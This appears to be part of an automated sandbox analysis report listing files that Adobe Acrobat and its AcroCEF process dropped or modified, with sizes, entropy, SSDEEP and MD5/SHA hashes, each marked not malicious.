Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.196887923781723 |
Encrypted: | false |
SSDEEP: | 6:iO4q7Y6+q2P92nKuAl9OmbnIFUtSq7Ys5Zmwsq7YstVkwO92nKuAl9OmbjLJ:7RYbv4HAahFUtPYo/1Yw5LHAaSJ |
MD5: | 2F6129D768176DF7DFDA081E57571BE6 |
SHA1: | E75CE1F81670E3AFDDF37B7C7652F2BC63984C6B |
SHA-256: | 72768DED8E3A29E049A56C23D4CE9D7ACFA754C08077B8D7C353F17887E72B49 |
SHA-512: | 0AD6A4B0A8EF3EE88E16419388F00C493BFCEEF916093A032B33005E65357EDEE60660C882FC6BD9A2E9063B1C5CBC33AFB56815FB9052E1F00509E76528E221 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.196887923781723 |
Encrypted: | false |
SSDEEP: | 6:iO4q7Y6+q2P92nKuAl9OmbnIFUtSq7Ys5Zmwsq7YstVkwO92nKuAl9OmbjLJ:7RYbv4HAahFUtPYo/1Yw5LHAaSJ |
MD5: | 2F6129D768176DF7DFDA081E57571BE6 |
SHA1: | E75CE1F81670E3AFDDF37B7C7652F2BC63984C6B |
SHA-256: | 72768DED8E3A29E049A56C23D4CE9D7ACFA754C08077B8D7C353F17887E72B49 |
SHA-512: | 0AD6A4B0A8EF3EE88E16419388F00C493BFCEEF916093A032B33005E65357EDEE60660C882FC6BD9A2E9063B1C5CBC33AFB56815FB9052E1F00509E76528E221 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 338 |
Entropy (8bit): | 5.112282534171058 |
Encrypted: | false |
SSDEEP: | 6:iO4q7YASq2P92nKuAl9Ombzo2jMGIFUtSq7YmbZmwsq7YmxkwO92nKuAl9Ombzos:7RYdv4HAa8uFUtPYmb/1Ymx5LHAa8RJ |
MD5: | A395B5467C9C1DA1E119E6BE9525F5E0 |
SHA1: | 2195CB97E98F760EC6E8497F3C1806C54C5475F5 |
SHA-256: | FA99CF2BB97CD0879E789E1D4D8EA17C47708D7B10BB8E05EBBF734CEF45107B |
SHA-512: | 263DDDBD369C3A8039175180AD6D1E071628594A9034D97BCF5221CFC96B23802CF672517EE96BFF537D60E60284E8FFE4845E9C8C719B4B1F24ADA15A91815A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 338 |
Entropy (8bit): | 5.112282534171058 |
Encrypted: | false |
SSDEEP: | 6:iO4q7YASq2P92nKuAl9Ombzo2jMGIFUtSq7YmbZmwsq7YmxkwO92nKuAl9Ombzos:7RYdv4HAa8uFUtPYmb/1Ymx5LHAa8RJ |
MD5: | A395B5467C9C1DA1E119E6BE9525F5E0 |
SHA1: | 2195CB97E98F760EC6E8497F3C1806C54C5475F5 |
SHA-256: | FA99CF2BB97CD0879E789E1D4D8EA17C47708D7B10BB8E05EBBF734CEF45107B |
SHA-512: | 263DDDBD369C3A8039175180AD6D1E071628594A9034D97BCF5221CFC96B23802CF672517EE96BFF537D60E60284E8FFE4845E9C8C719B4B1F24ADA15A91815A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\908a050a-5242-4887-a57f-3a3c9707e7bc.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 508 |
Entropy (8bit): | 5.038356065193074 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqj/ksBdOg2HzkAcaq3QYiubxnP7E4T3OF+:Y2sRdsqBdMHq3QYhbxP7nbI+ |
MD5: | FE4AABA4BD1873157F6A81C493874AD0 |
SHA1: | E97F4D8AFEFE3589BD40DD2FC6F9AE60918B03E4 |
SHA-256: | D5EB29986224A7CE76269C70B5B2D9111F1DADAACD66AFCB1D6ECCAED19D5418 |
SHA-512: | 039973810C4B8CF08CB31A19E0AD8C06D17AB0D2A40FAB40F5A2B7EDC5C0DBC2FDD9FFF172DF3B23442A060A0F7981152AF46A30DD5F479096D20D8F4D1533BD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 508 |
Entropy (8bit): | 5.038356065193074 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqj/ksBdOg2HzkAcaq3QYiubxnP7E4T3OF+:Y2sRdsqBdMHq3QYhbxP7nbI+ |
MD5: | FE4AABA4BD1873157F6A81C493874AD0 |
SHA1: | E97F4D8AFEFE3589BD40DD2FC6F9AE60918B03E4 |
SHA-256: | D5EB29986224A7CE76269C70B5B2D9111F1DADAACD66AFCB1D6ECCAED19D5418 |
SHA-512: | 039973810C4B8CF08CB31A19E0AD8C06D17AB0D2A40FAB40F5A2B7EDC5C0DBC2FDD9FFF172DF3B23442A060A0F7981152AF46A30DD5F479096D20D8F4D1533BD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4099 |
Entropy (8bit): | 5.2412531757409315 |
Encrypted: | false |
SSDEEP: | 96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLU2oPUK:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNLo |
MD5: | BFD8ADD9A051C230D1FF858AFF4EAFF7 |
SHA1: | ABB386A1BDD5A5E49AF9CAC94EC32AEE94B0E876 |
SHA-256: | 361A51557378DB379D2825AE2D8EC778FC44425EF65633CB8E0E75DCB7175319 |
SHA-512: | DA5137EB2C6300E02D0BC902325CD4FBEDB4886A43657D2E7C70D497E5BD8CCFF4465E6D8A6EE11A637FB96AC8AEE720A1689F6FF752C1C52785A15451C6CD06 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 326 |
Entropy (8bit): | 5.201092955210977 |
Encrypted: | false |
SSDEEP: | 6:iO4q7YQLOq2P92nKuAl9OmbzNMxIFUtSq7Y/Zmwsq7YaxzkwO92nKuAl9OmbzNMT:7RYcOv4HAa8jFUtPY//1Yaxz5LHAa84J |
MD5: | B2B9C28992124C551A25E41CAC6D75C4 |
SHA1: | 3E07A2B8C4ABFC1F83682B75D99A921FF4C2C647 |
SHA-256: | E23CDDBD883F631F973640B696B5FCAC21391950632A462FD4B896B9E5C29EB2 |
SHA-512: | F26CEC3DABEBBACF3B5D3C43F3FD6C9B4A1663CC93F12A570D87AEB80724A612F3108645FA70B79B9860CEB16B54DF1C13FA12AC6B9201FB9AFAC9E1C4F1518C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 326 |
Entropy (8bit): | 5.201092955210977 |
Encrypted: | false |
SSDEEP: | 6:iO4q7YQLOq2P92nKuAl9OmbzNMxIFUtSq7Y/Zmwsq7YaxzkwO92nKuAl9OmbzNMT:7RYcOv4HAa8jFUtPY//1Yaxz5LHAa84J |
MD5: | B2B9C28992124C551A25E41CAC6D75C4 |
SHA1: | 3E07A2B8C4ABFC1F83682B75D99A921FF4C2C647 |
SHA-256: | E23CDDBD883F631F973640B696B5FCAC21391950632A462FD4B896B9E5C29EB2 |
SHA-512: | F26CEC3DABEBBACF3B5D3C43F3FD6C9B4A1663CC93F12A570D87AEB80724A612F3108645FA70B79B9860CEB16B54DF1C13FA12AC6B9201FB9AFAC9E1C4F1518C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 57344 |
Entropy (8bit): | 3.293492745501664 |
Encrypted: | false |
SSDEEP: | 192:/edRBGfVui5V4R4dcQ5V4R4RtYWtEV2UUTTchqGp8F/7/z+FP:/eici5H5FY+EUUUTTcHqFzqFP |
MD5: | 11D42DC12872C85277A1BE2306B76587 |
SHA1: | 06F9164D252F53F3A2A0786F0FC5EED9674658C3 |
SHA-256: | 10753DE220989528BE0DCE019834EE0886BAADA0AAA99BD9E58647AE9FF66C62 |
SHA-512: | 9AF606A3770AAE0AA22E249DD26E2E8D9B2FCE18146BFB5B3C36F8BAE9B68E30B9F696E71D18751187C1787C8F0BD608F68B971DE163EA56BEC4163A649FC13C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.2034671496890432 |
Encrypted: | false |
SSDEEP: | 24:7+tCMEWewK2qLazkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9E:7MLU2qemFTIF3XmHjBoGGR+jMz+Lhqn |
MD5: | CFA972CE766D9C02252EA3EEE8BBAA90 |
SHA1: | C070D49283ACCD63DD01A4DABF6186CDFF5618D2 |
SHA-256: | 9C37625C4C3E14DD670AAEDE5A7BAAC74CEEB287B7B5FFFCACFCEC0E35E80007 |
SHA-512: | D914F9656C44D9A239BC05986EB76F2673F1D64EEEB0B59B07EA16EAB995D41EA2C53D475B3EB0EBD0C72B698D85BDE69349F1AF2D522B51D584DFE7DDEFEDFB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7170500916396234 |
Encrypted: | false |
SSDEEP: | 3:kkFklyrD2bPtfllXlE/HT8kClltNNX8RolJuRdxLlGB9lQRYwpDdt:kKrrSbPeT857NMa8RdWBwRd |
MD5: | F4A1C311D69C3B4C8EC28A1F1C91E591 |
SHA1: | 72916A77499E6EEAFE1F3AF56EE1CA6D2650186C |
SHA-256: | 33EF9F9A96B102679B83BF7092C9F2107CE6F4B05DB86CA70EBEEEBE38B4FBA7 |
SHA-512: | FC3105D146FEEB1AE9A2C3B1E0AFEE9FD1A234AF75F98FD80138E563F62769ECC7525E35A377E9A01C4C6FE9E4A4A9FE71A05455B2B0FF398FA79DF62649BE46 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.339744286256352 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHQcafXGVEwlAR+FIbRI6XVW7+0Y+2RUoAvJM3g98kUwPeUkwRe9:YvXKXpaKI0YpW7X2RnGMbLUkee9 |
MD5: | 6EE6EF03B5F8506DA5CDF01166CC008D |
SHA1: | 083E70FA9670970982CFCF87D411A6CF1AE3E606 |
SHA-256: | 0DE9E5B2C08B6C395726405A2FFAACBFE5B5CE82D3131E24AFC548DEE99FEE7F |
SHA-512: | 9B2FE6AE29B8FE557CB23C781E8638D12EB47C2EB0325DA7A898034743402DF464DB1ABA35F989C7B5F0C3CC381CD5A61F36CD3691BA9997F8FACE3AAC53C9AF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.281189089790879 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHQcafXGVEwlAR+FIbRI6XVW7+0Y+2RUoAvJfBoTfXpnrPeUkwRe9:YvXKXpaKI0YpW7X2RnGWTfXcUkee9 |
MD5: | AB7DAD48B30846A2EAF7B2B6E6D0D767 |
SHA1: | F7686308355E70B0753B9BD8AC325A3D660FF756 |
SHA-256: | 147B055D9E15533D697F7C1335682D6D7D29851569F6265406630051472D5224 |
SHA-512: | 4020B3CFF933F03EA9B9C846829D5608A74CA7BF967FB0320A630CA310415EDE37427F4C352143D1497166DB2A759B016B250E8A2F638CBB0D883443D199AD76 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.25958840865931 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHQcafXGVEwlAR+FIbRI6XVW7+0Y+2RUoAvJfBD2G6UpnrPeUkwRe9:YvXKXpaKI0YpW7X2RnGR22cUkee9 |
MD5: | 25DD96C756F31AB7E84386F4B53C6C1E |
SHA1: | 64DEF6F986C09C2E6E9517646382BF609630F814 |
SHA-256: | 78FFCE7F6FE224F2309120DDDA27689007B89D25056994EBD513449E14D340AF |
SHA-512: | 9695004B155BAD6DF641177FC5C3773BBBF6C58FAC06B1796B650021DADAE88C349F97F748ECA02BA8E83239BC2597B98EB747127878D64FB99352CA6715CA26 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.317808423557276 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHQcafXGVEwlAR+FIbRI6XVW7+0Y+2RUoAvJfPmwrPeUkwRe9:YvXKXpaKI0YpW7X2RnGH56Ukee9 |
MD5: | C0216DC08FAD54919C60DA45DF9C1797 |
SHA1: | 24EB2C63D6EE12D791A19EF7A2A94B309DEA4F0F |
SHA-256: | B10C9EBCD5ED8E24CE63C5A823B3751A1E6100C3056EE96F5F6C4C9D4594C1C8 |
SHA-512: | B5C2F3AD16BE0120D48772B60B66417A2A56FD91DFE86F584A7C922EABB8FF1B717712C0E58E591C4DD81E7D0911F564AE5540229B9F74D9600AF17A98613FB6 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.687574144213483 |
Encrypted: | false |
SSDEEP: | 24:Yv6XMKIliX/pLgE9cQx8LennAvzBvkn0RCmK8czOCCSx:Yv+IMX/hgy6SAFv5Ah8cv/x |
MD5: | ED9A4340ED04A0227DD1994ACC43ACD6 |
SHA1: | B3A22491FCFFD650195BB6E7EFB27A2E0073CC2B |
SHA-256: | F5F5CD439C5E133EBBCEA8B52E84B2E584784D9BCEAA37B313DC730206B10EF7 |
SHA-512: | 1EC98642F159BCCC604FF23BC23389EE9176B9DF47163AA75AA7EC5A759DFEBE563D1CFC7E1AFFA4D849B16E8C0706BCBDD78A1CA7775304FD90547A76912391 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.265365561286284 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHQcafXGVEwlAR+FIbRI6XVW7+0Y+2RUoAvJf8dPeUkwRe9:YvXKXpaKI0YpW7X2RnGU8Ukee9 |
MD5: | E591F8D29E6A7E891179CD390D9F2847 |
SHA1: | E55928104B7051D9BF00CC87EE3F8EAA430B5246 |
SHA-256: | A4819AE11AED8EED71505D1C903E230851A6566795B7EB0B1F67362BA738778D |
SHA-512: | 003992FFFD861FC7ACEB811B0172E8F269109A2FBC8D547D7A63FCDA7268CDA1281725DF9EF755DA21185DD4649C1BAD609C7E2C953BD2976619B2DC4196BBEF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.267585390150865 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHQcafXGVEwlAR+FIbRI6XVW7+0Y+2RUoAvJfQ1rPeUkwRe9:YvXKXpaKI0YpW7X2RnGY16Ukee9 |
MD5: | 8FD69C1A7DBBDC37B72B631D16C1E1ED |
SHA1: | 8C1B8E550C171EAB60013A757D024FE8D086CFA1 |
SHA-256: | 68063A2EFEAFA9177177F325D77A278C26A965A33FC765999CBE6CF83D3B5335 |
SHA-512: | 7400A34442F5B3DF148AC470CF3750B8E11465B899E495CB208ECC535F9B0108F22B68915934C5285D71C0FFE63A71FC6A6C2CB4D2EC25BEFDA26CC4FE000409 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.286387752429898 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHQcafXGVEwlAR+FIbRI6XVW7+0Y+2RUoAvJfFldPeUkwRe9:YvXKXpaKI0YpW7X2RnGz8Ukee9 |
MD5: | D07CA7FB71B2CA68F6E5A4C4646354D2 |
SHA1: | BC666A9627E83EFBFB4ED1B1D4B99D7782683862 |
SHA-256: | 16CE921986A274B13596D1D7930573E71DE5F8EC3381EF7E50A9543A58D1623B |
SHA-512: | BB6C4B7D06D2988A29054D557916D159FB44A2E9C2D044572724E13CEEE1AD0EE7DE5A01CE25F62EDCBBFE590ECA2B69DFAB10C272D6995D9D0EBAA93F956AB9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.293068420652779 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHQcafXGVEwlAR+FIbRI6XVW7+0Y+2RUoAvJfzdPeUkwRe9:YvXKXpaKI0YpW7X2RnGb8Ukee9 |
MD5: | 5004201A8DFD834C667086B956584C5F |
SHA1: | 7A51CAE6D95B8D56877342289489107F85E8A58C |
SHA-256: | B998EA4A9813D27700B3051FFDDCB394F7BDFEFA5EF3495FC5286FADD19451ED |
SHA-512: | EBF7E65EC207E107BE90A09DD5092562DEF102B5ECD62544E3E7C2427E0DC142B432DC52B37B612E0BB6B4B65D2C65D175F27DA4F11139AFA121DAD9663F2FC2 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.273443719838803 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHQcafXGVEwlAR+FIbRI6XVW7+0Y+2RUoAvJfYdPeUkwRe9:YvXKXpaKI0YpW7X2RnGg8Ukee9 |
MD5: | AD0251758B8A3D5F7CE9652B2A546D14 |
SHA1: | E98C5A9950E9167DF3A03EF31CDA74C1E733EBBD |
SHA-256: | 32124CF2DE55111D41FC92B3DAC225DD460A40F55EBBB505D53E5D884612946A |
SHA-512: | C0568E1C01CF9DC9C09739CD7A4F5E94C5FE2A3F36780598EE166DC144C1DAFC6817690F4188AA8E2ACEBE6913082DE638DB1F913559AC14E426A44AA18C37B1 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.258708850984954 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHQcafXGVEwlAR+FIbRI6XVW7+0Y+2RUoAvJf+dPeUkwRe9:YvXKXpaKI0YpW7X2RnG28Ukee9 |
MD5: | E3A8C00D1B619B1B8C56E0DE113F8362 |
SHA1: | A156A8FFA215A5A83035813DB6BC928D44568C29 |
SHA-256: | FEBE0106539DA88FAD40E4C208ACCDDD52704851128B8A82CB36334A67705C84 |
SHA-512: | 69B7A1B61C00D6FC126C76D6FBF1156BA9BA6B5964B2FEA04D758186775595691C6A0736FE992CBCA41278062116E98CDC806F6D05C5354134E98B2F3271AD73 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.257173334902092 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHQcafXGVEwlAR+FIbRI6XVW7+0Y+2RUoAvJfbPtdPeUkwRe9:YvXKXpaKI0YpW7X2RnGDV8Ukee9 |
MD5: | 85841C4843B3186B395A7B0C2B5313F5 |
SHA1: | DC0CBCBA9B2A960F739F3B30337A12090C785C82 |
SHA-256: | 6FB57DD71A9984476455E40B18432A619CF4E7B982FDB22E57B7D3A64683A451 |
SHA-512: | D7D0CDB0D4E1C436166914A49B7D995519D7DA7A9812B52629309662825E9BAC565851C6C0E49DB3F8EF67077A4EFFDB66358AF8B3F23F21C283A79FDC1FB0AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.258774841197165 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHQcafXGVEwlAR+FIbRI6XVW7+0Y+2RUoAvJf21rPeUkwRe9:YvXKXpaKI0YpW7X2RnG+16Ukee9 |
MD5: | E4E123C6806AC9669DB93DF20BF49CEF |
SHA1: | 61AA644A09BC2DF951FE06085F71121CA5631302 |
SHA-256: | F5885270A05925244532EE43F25D1EB2F34FB060A43F6F85B9EC6781F9748C6E |
SHA-512: | DBE6718472C36F5A9A1401A1B8223E5076EF7F72741519B7FF2DF63CFBCF32D2BC5244A98CD9E7299F451BBB77F43D6633470F9D420AFFD70BE5D1410F1221FB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
